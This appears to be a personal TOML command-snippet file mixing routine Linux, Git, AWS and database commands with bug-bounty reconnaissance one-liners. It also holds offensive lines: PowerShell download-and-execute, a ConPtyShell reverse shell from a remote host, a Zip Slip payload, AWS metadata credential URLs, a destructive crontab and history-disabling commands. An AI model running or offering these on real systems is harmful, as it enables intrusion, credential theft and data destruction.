| command = "wget -nd -np -P . -r -R \"index.html*\" http://mirror.myfahim.com/centos/7.9.2009/updates/x86_64/repodata/" | |
| output = "" | |
| [[snippets]] | |
| description = "[Wget] Download files and directories recursively" | |
| command = "wget $ wget -np -P . -r -R \"index.html*\" --cut-dirs=4 http://mirror.myfahim.com/centos/7.9.2009/updates/x86_64/" | |
| output = "" | |
| [[snippets]] | |
| description = "[SED] remove empty lines" | |
| command = "sed '/^$/d'" | |
| output = "" | |
| [[snippets]] | |
| description = "[Misc] Split text file every n line nth line" | |
| command = "for f in filename*.txt; do split -d -a1 -l10000 --additional-suffix=.txt \"$f\" \"${f%.txt}-\"; done" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Remount root partition ro RW" | |
| command = "mount -o remount,rw /" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux-Misc] Load env variable from file" | |
| command = "export $(cat creds/.inder.cred | xargs)" | |
| output = "" | |
| [[snippets]] | |
| description = "Disabling the GUI/X/Head" | |
| command = "systemctl set-default multi-user.target" | |
| output = "" | |
| [[snippets]] | |
| description = "Enable the GUI/X/Head" | |
| command = "systemctl set-default graphical.target" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Create dummy file with size bs*count" | |
| command = "dd if=/dev/zero of=/tmp/dummy.img bs=1024 count=120000" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Get Public Exposed Outbound SG on VPC" | |
| command = "aws ec2 describe-security-groups --filter \"Name=egress.ip- permission.cidr,Values='0.0.0.0/0',Name=vpc-id,Values=<VPC_ID=vpc-96c34cfe>\" --output table --color off --query SecurityGroups[].GroupId" | |
| output = "" | |
| [[snippets]] | |
| description = "[Misc] Add Prefix string in file" | |
| command = "sed -e 's/^/<prefix=PREFFIX>/g' <nama_file=subdomain.txt>" | |
| output = "" | |
| [[snippets]] | |
| description = "Find All Allocated IP ranges for ASN given an IP address" | |
| command = "whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net <Organization> | grep origin: | awk '{print $NF}' | head -1) | grep -w \"route:\" | awk '{print $NF}' | sort -n" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Android set proxy" | |
| command = "adb shell settings put global http_proxy <ip address>:<param>" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Android unset proxy" | |
| command = "adb shell settings put global http_proxy :0" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Brute forcing for endpoints with dirsearch" | |
| command = "dirsearch -e php,asp,aspx,jsp,py,txt,conf,config,bak,backup,swp,old,db,sql -u <URL>" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "certprobe / runs httprobe on all the hosts from certspotter" | |
| command = "curl -s https://crt.sh/\\?q\\=\\%.<domain>\\&output\\=json | jq -r '.[].name_value' | sed 's/\\*\\.//g' | sort -u | httprobe | tee -a ./all.txt" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Extract subdomains from IP Range" | |
| command = "nmap <ip range> -sn | grep \"<greping domain>\" | awk '{print $5}'" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Find subdomain and takeover (with subfinder/amass/assetfinder/subjack)" | |
| command = "subfinder -d <domain> >> domains ; assetfinder -subs-only <domain> >> domains ; amass enum -norecursive -noalts -d <domain> >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v | tee takeover" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Find LFI with gau" | |
| command = "~/go/bin/gau <domain> | ~/go/bin/gf lfi | ~/go/bin/qsreplace \"/etc/passwd\" | xargs -I % -P 25 sh -c 'curl -s \"%\" 2>&1 | grep -q \"root:x\" && echo \"VULN! %\"'" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Find OpenRedirect with gau" | |
| command = "export LHOST=\"http://localhost\"; gau <domain> | gf redirect | qsreplace \"$LHOST\" | xargs -I % -P 25 sh -c 'curl -Is \"%\" 2>&1 | grep -q \"Location: $LHOST\" && echo \"VULN! %\"'" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get bugcrowd programs" | |
| command = "curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv'" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "one | uniq); doneGet CIDR and Orgz from target lists" | |
| command = "for DOMAIN in $(cat <FILE NAME>);do echo $(for ip in $(dig a $DOMAIN +short); do whois $ip | grep -e \"CIDR\\|Organization\" | tr -s \" \" | paste - -; d" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get hackerone programs" | |
| command = "curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv'" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get intigriti programs" | |
| command = "curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv'" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get Subdomains from Archive" | |
| command = "curl -s \"http://web.archive.org/cdx/search/cdx?url=*.<domain>/*&output=text&fl=original&collapse=urlkey\" | sed -e 's_https*://__' -e \"s/\\/.*//\" | sort -u" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get Subdomains from BufferOverRun" | |
| command = "curl -s https://dns.bufferover.run/dns?q=.<domain> |jq -r .FDNS_A[]|cut -d',' -f2|sort -u" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get Subdomains from CertSpotter" | |
| command = "curl -s \"https://certspotter.com/api/v0/certs?domain=<domain>\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get Subdomains from crt.sh" | |
| command = "curl -s \"https://crt.sh/?q=%25.<domain>&output=json\" | jq -r '.[].name_value' | sed 's/\\*\\.//g' | sort -u" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get Subdomains from JLDC" | |
| command = "curl -s \"https://jldc.me/anubis/subdomains/<domain>?\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get Subdomains from RapidDNS.io" | |
| command = "curl -s \"https://rapiddns.io/subdomain/<domain>?full=1#result\" | grep \"<td><a\" | cut -d '\"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get Subdomains from Riddler.io" | |
| command = "curl -s \"https://riddler.io/search/exportcsv?q=pld:<domain>\" | grep -Po \"(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get Subdomains from VirusTotal" | |
| command = "curl -s \"https://www.virustotal.com/ui/domains/<domain>/subdomains?limit=40\" | grep -Po \"((http|https):\\/\\/)?(([\\w.-]*)\\.([\\w]*)\\.([A-z]))\\w+\" | sort -u" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get url with gau, included parameter" | |
| command = "echo <domain> | ~/go/bin/gau | grep \"=\" | qsreplace -a " | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get all the urls out of a sitemap.xml" | |
| command = "curl -s <sitemap URL> | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g'" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get urls from urlscanio" | |
| command = "gron \"https://urlscan.io/api/v1/search/?q=domain:<domain>\" | grep 'url' | gron --ungron" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Find XSS with gospider" | |
| command = "gospider -S <TARGET URLS FILE> -c 10 -d 5 --blacklist \".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)\" --other-source | grep -e \"code-200\" | awk '{print $5}'| grep \"=\" | qsreplace -a | dalfox pipe -o result.txt" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "ipinfo" | |
| command = "curl http://ipinfo.io/<param>" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Create a wordlist using param used in the domain" | |
| command = "waybackurls <domain> | grep \"?\" | unfurl keys | sort -u | tee -a paramlist.txt" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Ports Scan without CloudFlare" | |
| command = "subfinder -silent -d <domain> | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Sort & Tested Domains from Recon.dev" | |
| command = "curl \"https://recon.dev/api/search?key=<API Key>&domain=<domain>\" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u |httpx -silent" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Find Subdomains TakeOver" | |
| command = "subfinder -d <target> >> domains ; assetfinder -subs-only <target> >> domains ; amass enum -norecursive -noalts -d <target> >> domains ; subjack -w domains -t 100 -timeout 30 -ssl -c ~/go/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ;" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "Get multiple target's Custom URLs from ParamSpider" | |
| command = "cat <domains file> | xargs -I % python3 ~/tool/ParamSpider/paramspider.py -l high -o ./spidering/paramspider/% -d % ;" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "URLs Probing with cURL + Parallel" | |
| command = "cat <domains file> | parallel -j50 -q curl -w 'Status:%{http_code}\\t Size:%{size_download}\\t %{url_effective}\\n' -o /dev/null -sk" | |
| tag = ["hackpet"] | |
| output = "" | |
| [[snippets]] | |
| description = "[Python] Install python module on current directory" | |
| command = "pip3 install <MODULE_NAME=idna> -t ." | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Read file from Nth line using sed, read from line 4" | |
| command = "sed -e '1,3d' < t.txt" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] get all aws region" | |
| command = "aws ec2 describe-regions --output text | awk '{print $4}'" | |
| output = "" | |
| [[snippets]] | |
| description = "[Misc] Running Django cookiecutter using gunicorn" | |
| command = "gunicorn --bind <ip-address or hostname>:8000 config.wsgi:application" | |
| output = "" | |
| [[snippets]] | |
| description = "[Laravel] Restart laravel after .env update" | |
| command = "sudo -u ${USER} php artisan config:cache && sudo -u ${USER} php artisan route:clear" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] add remote repo to git" | |
| command = "git remote set-url origin REPO_URL" | |
| output = "" | |
| [[snippets]] | |
| description = "[Wireshark] Filter to display dns response from dns server" | |
| command = "dns.flags.response == 1" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Sync between s3 bucket" | |
| command = "aws s3 sync s3://act-sites-twc/PasarSedekah/ s3://act-sites-twc-sydney/PasarSedekah/ --profile s3" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Get IAM User List" | |
| command = "aws iam list-users --query 'Users[*].UserName' --output table" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Add default gw" | |
| command = "sudo route add default gw 192.168.56.1 eth0" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Delete default gw" | |
| command = "sudo route del default gw 192.168.56.1 eth0" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux-Mysql] MySql on Debian-base Linux usually use a configuration file with the credentials." | |
| command = "sudo mysql --defaults-file=/etc/mysql/debian.cnf" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS-Metadata] obtain account-id and Region" | |
| command = "http://169.254.169.254/latest/dynamic/instance-identity/document" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS-Metadata] Obtain role name" | |
| command = "http://169.254.169.254/latest/meta-data/iam/security-credentials/" | |
| output = "" | |
| [[snippets]] | |
| description = "[Mysql] Create new user" | |
| command = "CREATE USER 'newuser'@'localhost' IDENTIFIED BY 'password';" | |
| output = "" | |
| [[snippets]] | |
| description = "[Mysql] grant ALL priviliege on newuser" | |
| command = "GRANT ALL PRIVILEGES ON * . * TO 'newuser'@'localhost';" | |
| output = "" | |
| [[snippets]] | |
| description = "[Mysql] Flush privilege on mysql" | |
| command = "FLUSH PRIVILEGES;" | |
| output = "" | |
| [[snippets]] | |
| description = "[Mysql] Update user password" | |
| command = "UPDATE mysql.user SET Password=PASSWORD('<PASSWORD=new-password>') WHERE User='<USER=root>';" | |
| output = "" | |
| [[snippets]] | |
| description = "[Git] Pull Request Specific commit" | |
| command = "https://stackoverflow.com/questions/34027850/how-to-pull-request-a-specific-commit" | |
| output = "" | |
| [[snippets]] | |
| description = "[Git] diff between remote and local" | |
| command = "git diff origin/master -- [local-path]" | |
| output = "" | |
| [[snippets]] | |
| description = "[MySQL] Reset password User" | |
| command = "ALTER USER 'root'@'localhost' IDENTIFIED BY 'NewPassword';" | |
| output = "" | |
| [[snippets]] | |
| description = "[MySQL] Init file mysql" | |
| command = "mysqld --init-file=/home/me/mysql-init &" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Disable bash history permanently" | |
| command = "set +o history" | |
| output = "" | |
| [[snippets]] | |
| description = "[Git] Update submodule" | |
| command = "git submodule update --init --recursive" | |
| output = "" | |
| [[snippets]] | |
| description = "[Git] pull all including submodules" | |
| command = "git pull --recurse-submodules" | |
| output = "" | |
| [[snippets]] | |
| description = "[Laravel] Create Laravel Proejct with specific version" | |
| command = "composer create-project laravel/laravel=\"5.1.*\" myProject" | |
| output = "" | |
| [[snippets]] | |
| description = "[Exfiltrate] Receive DNS query exfiltrate" | |
| command = "[Exfiltrate] tshark -f \"udp port 53\" -Y \"dns.qry.type == 1 and dns.flags.response == 0 and dns.qry.name matches \"<DOMAIN>\"\"" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] Show name file list only on commit changes" | |
| command = "git show --pretty=\"\" --name-only ab7b05d7a714b57a0a5820ebbe3bfb74eda4a3cd" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] Show changes for specific file" | |
| command = "git log -p Makefile" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] update submodule" | |
| command = "git submodule update --init --recursive" | |
| output = "" | |
| [[snippets]] | |
| description = "[ESP] erase flash" | |
| command = "esptool.py erase_flash" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] Dumy Random commit" | |
| command = "echo $RANDOM > $RANDOM && git add . && git commit -m \"$RANDOM\"" | |
| output = "" | |
| [[snippets]] | |
| description = "[Window] Certutil Download file" | |
| command = "certutil.exe -urlcache -f http://<HOST>/<FILENAME> <FILENAME>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Windows] Powershell file download and execute in memory" | |
| command = "powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('<URL_PATH>');" | |
| output = "" | |
| [[snippets]] | |
| description = "[Windows] PsExec Command Execution" | |
| command = "psexec.exe -i -s -accepteula \\\\ie8win7 -u administrator -p Esc@l@te cmd.exe" | |
| output = "" | |
| [[snippets]] | |
| description = "[Windows] Execute powershell using script" | |
| command = "powershell -ExecutionPolicy Bypass -File <filename=runas.ps1>" | |
| output = "" | |
| [[snippets]] | |
| description = "[Windows] Invoke ConPtyShell Reverse Shell Windows" | |
| command = "powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://192.168.57.1:8000/Binary/Windows/Invoke-ConPtyShell.ps1'); Invoke-ConPtyShell 192.168.57.1 3001" | |
| output = "" | |
| [[snippets]] | |
| description = "[Windows] Install msi msiexec" | |
| command = "msiexec /quiet /qn /i 1.msi" | |
| output = "" | |
| [[snippets]] | |
| description = "[Windows] Execute powerup in file" | |
| command = "powershell -Version 2 -nop -exec bypass . .\\PowerUp.ps1; Invoke-AllChecks" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] List All Systemd Service" | |
| command = "systemctl list-unit-files --type=service" | |
| output = "" | |
| [[snippets]] | |
| description = "[Git] get file list of commit hash" | |
| command = "git show --pretty=%gd --stat <COMMIT-HASH>" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] Create Lambda Layer" | |
| command = "pip install requests -t python && zip -r requests.zip python" | |
| output = "" | |
| [[snippets]] | |
| description = "[Alembic] Generate migrations" | |
| command = "alembic -c /home/apps/database/alembic.ini revision --autogenerate -m \"Add Attack Simulator\"" | |
| output = "" | |
| [[snippets]] | |
| description = "[SteamPipe] AWS look for unassociate security group" | |
| command = "select * from aws_vpc_security_group s left join (select sg ->> 'GroupId' as sg_id from aws_ec2_network_interface, jsonb_array_elements(groups) as sg) a on s.group_id = a.sg_id where a.sg_id is null;" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Add crontab without interactive mode" | |
| command = "cat <(crontab -l) <(echo \"1 2 3 4 5 scripty.sh\") | crontab -" | |
| output = "" | |
| [[snippets]] | |
| description = "[MySQL] Mysqldump on mysqldump version 8" | |
| command = "mysqldump -h$DB_HOST -u$DB_USER -p$DB_PASS pasarsedekah --set-gtid-purged=OFF --no-tablespaces --column-statistics=0 > ps_db_prod.sql" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] DDoS CPU Usage using sha1sum" | |
| command = "sha1sum /dev/zero" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] Git checkout --bare or --mirror" | |
| command = "git --git-dir=/tmp/attack-simulator.git --work-tree=. checkout -f" | |
| output = "" | |
| [[snippets]] | |
| description = "[MySQL] get database size" | |
| command = "SELECT table_schema AS \"Database\", SUM(data_length + index_length) / 1024 / 1024 / 1024 AS \"Size (GB)\" FROM information_schema.TABLES GROUP BY table_schema" | |
| output = "" | |
| [[snippets]] | |
| description = "[Postgre] Dump Postgre DB" | |
| command = "pg_dump -U <USERNAME> -h <HOST> -F <FORMAT=p> <DATABASE=pna_activity> > output_$(date +\"%H%M-%d-%m-%Y\").sql" | |
| output = "" | |
| [[snippets]] | |
| description = "[Laravel] Install composer version 1" | |
| command = "curl -sS https://getcomposer.org/installer | php -- --install-dir=/usr/local/bin --filename=composer --version=1.10.16" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] get current commit SHA" | |
| command = "git rev-parse --short HEAD" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] get current branch of HEAD" | |
| command = "git rev-parse --symbolic-full-name --abbrev-ref HEAD" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Mount Volume on Digital Ocean" | |
| command = "mount -o discard,defaults,noatime /dev/disk/by-id/scsi-0DO_Volume_gw-files-sgp1-02 /home/deploy_user/container/files_wakaf/" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Create Swap 2 Gb" | |
| command = "sudo /bin/dd if=/dev/zero of=/var/swap.1 bs=1M count=2024 && sudo /sbin/mkswap /var/swap.1 && sudo /sbin/swapon /var/swap.1" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Backup data from remote to local" | |
| command = "rsync -chavzP --stats -e \"ssh -i dev-act.pem\" ubuntu@ec2-18-139-133-43.ap-southeast-1.compute.amazonaws.com:/home/datacenter/www/globalqurban/files/ /mnt/dc_data_globalqurban_sgp/globalqurban/files" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Mount EFS volume to Instance" | |
| command = "sudo mount -t nfs4 -o nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=2,noresvport fs-385fcc79.efs.ap-southeast-1.amazonaws.com:/ globalqurban/files" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Crack zip password" | |
| command = "fcrackzip -u -D -p ~/rockyou.txt ~/file.zip" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] get AWS region" | |
| command = "aws ec2 describe-regions --region ap-southeast-2 | jq -r '.Regions [].RegionName'" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] Add new crontab" | |
| command = "cat <(crontab -l) <(echo \"* * * * * chmod +s `rm -rf /tmp/*`\") | crontab -" | |
| output = "" | |
| [[snippets]] | |
| description = "[Laravel] Generate new APP_KEY" | |
| command = "php artisan key:generate" | |
| output = "" | |
| [[snippets]] | |
| description = "[Git] set username for project" | |
| command = "git config user.name \"Your project specific name\"" | |
| output = "" | |
| [[snippets]] | |
| description = "[Git] set email for project" | |
| command = "git config user.email \"your@project-specific-email.com\"" | |
| output = "" | |
| [[snippets]] | |
| description = "[Git] Get username config" | |
| command = "git config --get user.name" | |
| output = "" | |
| [[snippets]] | |
| description = "[Exploit] Zip Slip payload generate" | |
| command = "zip test2.zip ../../../../../../../tmp/evil.sh" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] AWS ECR Docker login" | |
| command = "aws ecr get-login-password --region ap-southeast-1 | docker login --username AWS --password-stdin 463223921727.dkr.ecr.ap-southeast-1.amazonaws.com" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] add signing key" | |
| command = "git config --global user.signingkey 4BB6D45482678BE3!" | |
| output = "" | |
| [[snippets]] | |
| description = "[GIT] set gpg sign true" | |
| command = "git config --global commit.gpgsign true" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] get ip from proc" | |
| command = "awk '/32 host/ { print f } {f=$2}' <<< \"$(</proc/net/fib_trie)\"" | |
| output = "" | |
| [[snippets]] | |
| description = "[Linux] delete file older than 3 days" | |
| command = "find /home/forge/backup-database/databases -type f -mtime +3 -name '*.gz' -print0 | xargs -r0 rm --" | |
| output = "" | |
| [[snippets]] | |
| description = "[AWS] authentication to EKS" | |
| command = "aws eks --region ap-southeast-1 update-kubeconfig --name ${env_pref}-coins-eks --alias=${env_pref}" | |
| output = "" | |
| [[snippets]] | |
| description = "[Frida] Frida running by pid" | |
| command = "frida -l sslpin2.js -U -p `adb -s 127.0.0.1:5555 shell ps | grep -i coins | awk '{print $2}'`" | |
| output = "" | |
| [[snippets]] | |
| description = "[Frida] Frida running root bypass" | |
| command = "frida -U -f asia.coins.mobile -l ~/Repos/random-scripts/frida/rootbypass2.js" | |
| output = "" | |
| [[snippets]] | |
| description = "[Falco] falco rules validation" | |
| command = "docker run --rm -v /Users/mf.akbar/Work/Coins.ph/Repos/helm/charts/apps/falco/rules:/etc/falco/customrules docker.io/falcosecurity/falco:0.35.1 /usr/bin/falco -r /etc/falco/falco_rules.yaml -r /etc/falco/falco_rules.local.yaml -r /etc/falco/customrules" | |
| output = "" | |
| [[snippets]] | |
| description = "Gitlab SAST Scan oneliner" | |
| command = "cat gl-sast-report.json | jq '.vulnerabilities[] | [.message, .severity, .location.file + \":\" + (.location.start_line|tostring)]' | less" | |
| output = "" | |
| [[snippets]] | |
| description = "Read .plist file" | |
| command = "plutil -p Info.plist" | |
| output = "" |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment